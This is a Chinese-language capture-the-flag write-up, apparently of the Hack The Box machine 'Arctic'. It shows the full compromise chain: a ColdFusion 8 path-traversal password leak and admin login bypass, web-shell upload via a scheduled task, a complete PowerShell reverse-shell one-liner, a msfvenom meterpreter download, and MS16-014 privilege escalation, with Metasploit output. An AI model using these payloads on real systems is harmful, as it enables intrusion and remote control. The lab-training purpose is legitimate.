废话不多说直接开始:
第一步是在计算机上运行NMAP:
# Nmap 7.80 scan initiated Sat Sep 19 14:54:46 2020 as: nmap -sV -O -sC -p- -oN scan 10.10.10.11
Nmap scan report for 10.10.10.11
Host is up (0.021s latency).
Not shown: 65532 filtered ports
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
8500/tcp open fmtp?
49154/tcp open msrpc Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|phone|specialized
Running (JUST GUESSING): Microsoft Windows 8|Phone|2008|7|8.1|Vista|2012 (92%)
OS CPE: cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1 cpe:/o:microsoft:windows_server_2012
Aggressive OS guesses: Microsoft Windows 8.1 Update 1 (92%), Microsoft Windows Phone 7.5 or 8.0 (92%), Microsoft Windows 7 or Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 R2 or Windows 8.1 (91%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (91%), Microsoft Windows 7 (91%), Microsoft Windows 7 Professional or Windows 8 (91%), Microsoft Windows 7 SP1 or Windows Server 2008 R2 (91%), Microsoft Windows Vista SP0 or SP1, Windows Server 2008 SP1, or Windows 7 (91%)
No exact OS matches for host (test conditions non-ideal).
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windowsOS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Sep 19 15:00:16 2020 -- 1 IP address (1 host up) scanned in 329.63 seconds
从输出中我们可以看到MSRPC正在135和49154上运行,并且端口8500上可能存在FMTP。我更仔细地研究了端口8500,浏览到该端口后发现它正在运行Adobe Coldfusion。浏览到管理员登录页面表示其正在运行版本8。
http://10.10.10.11:8500/CFIDE/administrator/index.cfm
nets.ec提供了一个很好的资源,涉及冷熔黑客攻击以及使用本地文件泄露漏洞登录管理面板。如网站上所述,第一个步骤是使用LFI漏洞通过浏览到以下位置来查看password.properties文件:
http://10.10.10.11:8500/CFIDE/administrator/enter.cfm?locale=…\ColdFusion8\lib\password.properties%00en
然后,这向我们显示了哈希密码值:
然后,您将哈希复制到密码字段中,并通过从地址栏中执行以下脚本来运行以下JavaScript脚本:
javascript:alert(hex_hmac_sha1(document.loginform.salt.value,document.loginform.cfadminPassword.value))
这将生成带有HMACed哈希的警报。
然后,我启动了BURP,并使它能够拦截HTTP通信。我从Coldfusion管理面板发出了HTTP请求。需要在BURP中修改该请求,因为cfadminPassword值与JavaScript警报中报告的HMACed值匹配。我的POST请求如下所示:
POST /CFIDE/administrator/enter.cfm HTTP/1.1Host: 10.10.10.11:8500User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateReferer: http://10.10.10.11:8500/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\ColdFusion8\lib\password.properties%00enContent-Type: application/x-www-form-urlencodedContent-Length: 422Connection: closeCookie: CFID=100; CFTOKEN=75808739Upgrade-Insecure-Requests: 1cfadminPassword=AD8AC0F171DEEACB68EA99CF11A19C4E2CFC9C97&requestedURL=%2FCFIDE%2Fadministrator%2Fenter.cfm%3Flocale%3D..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CColdFusion8%5Clib%5Cpassword.properties%2500en&salt=1601344007175&submit=%23Wed+Mar+22+20%3A53%3A51+EET+2017%0D%0Ardspassword%3D0IA%2FF%5B%5BE%3E%5B%24_6%26+%5C%5CQ%3E%5BK%5C%3DXP++%5Cn%0D%0Apassword%3D2F635F6D20E3FDE0C53075A84B68FB07DCEC9B03%0D%0Aencrypted%3Dtrue
将修改后的POST请求从BURP转发到Coldfusion服务器后,您就可以成功登录。然后,我继续按照指南在计算机上生成反向Shell。我打开了Coldfusion管理面板左侧的“计划任务”菜单,并创建了一个新的计划任务。我想上传kali随附的CFM Shell。可以在/usr/share/webshells/cfm/cfexec.cfm中找到它。我使用以下命令在我的kali机器上启动了python HTTP服务器来托管此shell:
python -m SimpleHTTPServer 8000
然后,我在Coldfusion中创建了计划任务,确保在我的Kali机器上输入外壳程序的URL以及要保存该外壳程序的位置。可以在映射下找到。
然后,我提交了计划任务,执行了该任务,然后浏览到我选择保存外壳程序的位置。我对shell表示欢迎,这意味着计划的任务成功地从我的kali机器下载并保存了shell:
然后,我在命令文本框中输入“ c:\ windows \ system32 \ cmd.exe”,并在选项框中输入以下命令:
/c powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.14.34',2700);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()" > C:\ColdFusion8\wwwroot\bs.txt
这将在端口2700上为我的kali机器创建一个反向外壳。我打开MSFCONSOLE并在端口2700上启动了一个多重处理程序。然后我从Coldfusion Shell Web界面执行了Powershell反向外壳:
msf5 exploit(windows/http/rejetto_hfs_exec) > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf5 exploit(multi/handler) > set lhost tun0
lhost => tun0
msf5 exploit(multi/handler) > set lport 2700
lport => 2700
msf5 exploit(multi/handler) > run[*] Started reverse TCP handler on 10.10.14.34:2700
[*] Command shell session 1 opened (10.10.14.34:2700 -> 10.10.10.11:54928) at 2020-09-28 13:07:26 -0400S C:\ColdFusion8\runtime\bin> cd /
PS C:\> cd Users
PS C:\Users> lsDirectory: C:\UsersMode LastWriteTime Length Name
---- ------------- ------ ----
d---- 22/3/2017 8:10 ?? Administrator
d-r-- 14/7/2009 7:57 ?? Public
d---- 22/3/2017 9:00 ?? tolis PS C:\Users> cd tolis
PS C:\Users\tolis> cd Desktop
PS C:\Users\tolis\Desktop> lsDirectory: C:\Users\tolis\DesktopMode LastWriteTime Length Name
---- ------------- ------ ----
-ar-- 22/3/2017 9:01 ?? 32 user.txt PS C:\Users\tolis\Desktop> cat user.txt
[REDACTED]
从输出中,您可以看到它已成功执行,并且我能够读取用户标志。
下一步是执行特权升级。我首先尝试将基本的反向TCP外壳提升为meterpreter外壳。我使用MSF毒液创建了一个exe,可以从当前的shell执行该exe,以生成一个meterpreter shell。
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.38 LPORT=2901 -f exe > 0005.exe
然后使用以下命令将其上传到Arctic机器:
powershell "(New-Object System.Net.WebClient).Downloadfile('http://10.10.14.38:8000/0005.exe','0005.exe')"
然后,我在metasploit中启动了一个多处理程序,以监听端口2901,并执行了利用程序。
msf5 exploit(windows/http/rejetto_hfs_exec) > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf5 exploit(multi/handler) > set lhost tun0
lhost => tun0
msf5 exploit(multi/handler) > set lport 2901
lport => 2901
msf5 exploit(multi/handler) > run[*] Started reverse TCP handler on 10.10.14.38:2901
然后,我执行了exe:
C:\ColdFusion8\runtime\bin>dir
dirVolume in drive C has no label.Volume Serial Number is F88F-4EA5Directory of C:\ColdFusion8\runtime\bin03/10/2020 09:35 �� <DIR> .
03/10/2020 09:35 �� <DIR> ..
03/10/2020 09:29 �� 73.802 0005.exe
03/10/2020 09:34 �� <DIR> AppData
18/03/2008 12:11 �� 64.512 java2wsdl.exe
19/01/2008 10:59 �� 2.629.632 jikes.exe
18/03/2008 12:11 �� 64.512 jrun.exe
18/03/2008 12:11 �� 71.680 jrunsvc.exe
18/03/2008 12:11 �� 5.120 jrunsvcmsg.dll
18/03/2008 12:11 �� 64.512 jspc.exe
22/03/2017 09:53 �� 1.804 jvm.config
03/10/2020 08:10 �� 84 ll.bat
18/03/2008 12:11 �� 64.512 migrate.exe
18/03/2008 12:11 �� 34.816 portscan.dll
03/10/2020 09:33 �� 12.674 Powerless.bat
03/10/2020 08:11 �� 15 pp.bat
18/03/2008 12:11 �� 64.512 sniffer.exe
03/10/2020 09:35 �� 125.131 thoi.txt
18/03/2008 12:11 �� 78.848 WindowsLogin.dll
18/03/2008 12:11 �� 64.512 wsconfig.exe
22/03/2017 09:53 �� 1.013 wsconfig_jvm.config
18/03/2008 12:11 �� 64.512 wsdl2java.exe
18/03/2008 12:11 �� 64.512 xmlscript.exe 20 File(s) 3.550.715 bytes 3 Dir(s) 32.910.712.832 bytes free C:\ColdFusion8\runtime\bin>0005.exe
0005.exe C:\ColdFusion8\runtime\bin>
执行后,创建了meterpreter会话:
msf5 exploit(multi/handler) > run[*] Started reverse TCP handler on 10.10.14.38:2901
[*] Sending stage (176195 bytes) to 10.10.10.11
[*] Meterpreter session 2 opened (10.10.14.38:2901 -> 10.10.10.11:53407) at 2020-10-02 06:48:17 -0400
[*] Sending stage (176195 bytes) to 10.10.10.11
[*] Meterpreter session 3 opened (10.10.14.38:2901 -> 10.10.10.11:53379) at 2020-10-02 06:48:18 -0400
[-] Failed to load client script file: /usr/share/metasploit-framework/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv.rbmeterpreter > sysinfo
Computer : ARCTIC
OS : Windows 2008 R2 (6.1 Build 7600).
Architecture : x64
System Language : el_GR
Domain : HTB
Logged On Users : 1
Meterpreter : x86/windows
meterpreter >
现在,在meterpreter会话中,我使用了漏洞利用程序建议程序来找到可用于该会话的兼容漏洞利用程序:
msf5 exploit(multi/handler) > use post/multi/recon/local_exploit_suggester
msf5 post(multi/recon/local_exploit_suggester) > set session 3
session => 3
msf5 post(multi/recon/local_exploit_suggester) > show optionsModule options (post/multi/recon/local_exploit_suggester):Name Current Setting Required Description---- --------------- -------- -----------SESSION 3 yes The session to run this module onSHOWDESCRIPTION false yes Displays a detailed description for the available exploitsmsf5 post(multi/recon/local_exploit_suggester) > run[*] 10.10.10.11 - Collecting local exploits for x64/windows...
[*] 10.10.10.11 - 17 exploit checks are being tried...
[+] 10.10.10.11 - exploit/windows/local/bypassuac_dotnet_profiler: The target appears to be vulnerable.
[+] 10.10.10.11 - exploit/windows/local/bypassuac_sdclt: The target appears to be vulnerable.
nil versions are discouraged and will be deprecated in Rubygems 4
[+] 10.10.10.11 - exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable.
[+] 10.10.10.11 - exploit/windows/local/ms16_014_wmi_recv_notif: The target appears to be vulnerable.
[+] 10.10.10.11 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable.
[*] Post module execution completed
您可以从输出中看到它建议可以使用的多种漏洞利用。我决定在这种情况下使用MS16-014。我加载了漏洞利用程序,将其设置为针对我的meterpreter会话并运行它:
msf5 exploit(windows/local/ms16_075_reflection) > use exploit/windows/local/ms16_014_wmi_recv_notif
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/local/ms16_014_wmi_recv_notif) > set session 3
session => 3
msf5 exploit(windows/local/ms16_014_wmi_recv_notif) > show optionsModule options (exploit/windows/local/ms16_014_wmi_recv_notif):Name Current Setting Required Description---- --------------- -------- -----------SESSION 3 yes The session to run this module on.Payload options (windows/x64/meterpreter/reverse_tcp):Name Current Setting Required Description---- --------------- -------- -----------EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)LHOST 10.10.14.38 yes The listen address (an interface may be specified)LPORT 4444 yes The listen portExploit target:Id Name-- ----0 Windows 7 SP0/SP1msf5 exploit(windows/local/ms16_014_wmi_recv_notif) > run[*] Started reverse TCP handler on 10.10.14.38:4444
[*] Launching notepad to host the exploit...
[+] Process 300 launched.
[*] Reflectively injecting the exploit DLL into 300...
[*] Injecting exploit into 300...
[*] Exploit injected. Injecting payload into 300...
[*] Payload injected. Executing exploit...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (201283 bytes) to 10.10.10.11
[*] Meterpreter session 4 opened (10.10.14.38:4444 -> 10.10.10.11:53424) at 2020-10-02 06:51:10 -0400
这成功产生了特权会话,从这里我可以访问Administrator桌面并检索root标志:
meterpreter > cd /users
meterpreter > dir
Listing: C:\users
=================Mode Size Type Last modified Name
---- ---- ---- ------------- ----
40777/rwxrwxrwx 0 dir 2017-03-22 13:47:41 -0400 Administrator
40777/rwxrwxrwx 0 dir 2009-07-14 01:06:44 -0400 All Users
40555/r-xr-xr-x 0 dir 2009-07-13 23:20:08 -0400 Default
40777/rwxrwxrwx 0 dir 2009-07-14 01:06:44 -0400 Default User
40555/r-xr-xr-x 4096 dir 2009-07-13 23:20:08 -0400 Public
100666/rw-rw-rw- 174 fil 2009-07-14 00:57:55 -0400 desktop.ini
40777/rwxrwxrwx 8192 dir 2017-03-22 15:00:00 -0400 tolismeterpreter > cd Administrator
meterpreter > dir
Listing: C:\users\Administrator
===============================Mode Size Type Last modified Name
---- ---- ---- ------------- ----
40777/rwxrwxrwx 0 dir 2017-03-22 13:47:42 -0400 AppData
40777/rwxrwxrwx 0 dir 2017-03-22 13:47:42 -0400 Application Data
40555/r-xr-xr-x 0 dir 2017-03-22 13:47:48 -0400 Contacts
40777/rwxrwxrwx 0 dir 2017-03-22 13:47:42 -0400 Cookies
40555/r-xr-xr-x 0 dir 2017-03-22 13:47:42 -0400 Desktop
40555/r-xr-xr-x 0 dir 2017-03-22 13:47:42 -0400 Documents
40555/r-xr-xr-x 0 dir 2017-03-22 13:47:42 -0400 Downloads
40555/r-xr-xr-x 0 dir 2017-03-22 13:47:42 -0400 Favorites
40777/rwxrwxrwx 0 dir 2017-03-22 14:10:31 -0400 InstallAnywhere
40555/r-xr-xr-x 0 dir 2017-03-22 13:47:42 -0400 Links
40777/rwxrwxrwx 0 dir 2017-03-22 13:47:42 -0400 Local Settings
40555/r-xr-xr-x 0 dir 2017-03-22 13:47:42 -0400 Music
40777/rwxrwxrwx 0 dir 2017-03-22 13:47:42 -0400 My Documents
100666/rw-rw-rw- 524288 fil 2017-03-22 13:47:41 -0400 NTUSER.DAT
100666/rw-rw-rw- 65536 fil 2017-03-22 13:47:42 -0400 NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf
100666/rw-rw-rw- 524288 fil 2017-03-22 13:47:42 -0400 NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms
100666/rw-rw-rw- 524288 fil 2017-03-22 13:47:42 -0400 NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms
40777/rwxrwxrwx 0 dir 2017-03-22 13:47:42 -0400 NetHood
40555/r-xr-xr-x 0 dir 2017-03-22 13:47:42 -0400 Pictures
40777/rwxrwxrwx 0 dir 2017-03-22 13:47:42 -0400 PrintHood
40777/rwxrwxrwx 0 dir 2017-03-22 13:47:42 -0400 Recent
40555/r-xr-xr-x 0 dir 2017-03-22 13:47:42 -0400 Saved Games
40555/r-xr-xr-x 0 dir 2017-03-22 13:47:48 -0400 Searches
40777/rwxrwxrwx 0 dir 2017-03-22 13:47:42 -0400 SendTo
40777/rwxrwxrwx 0 dir 2017-03-22 13:47:42 -0400 Start Menu
40777/rwxrwxrwx 0 dir 2017-03-22 13:47:42 -0400 Templates
40555/r-xr-xr-x 0 dir 2017-03-22 13:47:42 -0400 Videos
100666/rw-rw-rw- 262144 fil 2017-03-22 13:47:42 -0400 ntuser.dat.LOG1
100666/rw-rw-rw- 0 fil 2017-03-22 13:47:42 -0400 ntuser.dat.LOG2
100666/rw-rw-rw- 20 fil 2017-03-22 13:47:42 -0400 ntuser.inimeterpreter > cd Desktop
meterpreter > dir
Listing: C:\users\Administrator\Desktop
=======================================Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100666/rw-rw-rw- 282 fil 2017-03-22 13:47:48 -0400 desktop.ini
100444/r--r--r-- 32 fil 2017-03-22 15:01:59 -0400 root.txtmeterpreter > cat root.txt
[REDACTED]
meterpreter >
关注微信公众号:知柯信息安全 获取更多资讯
排版:知柯-匿名者
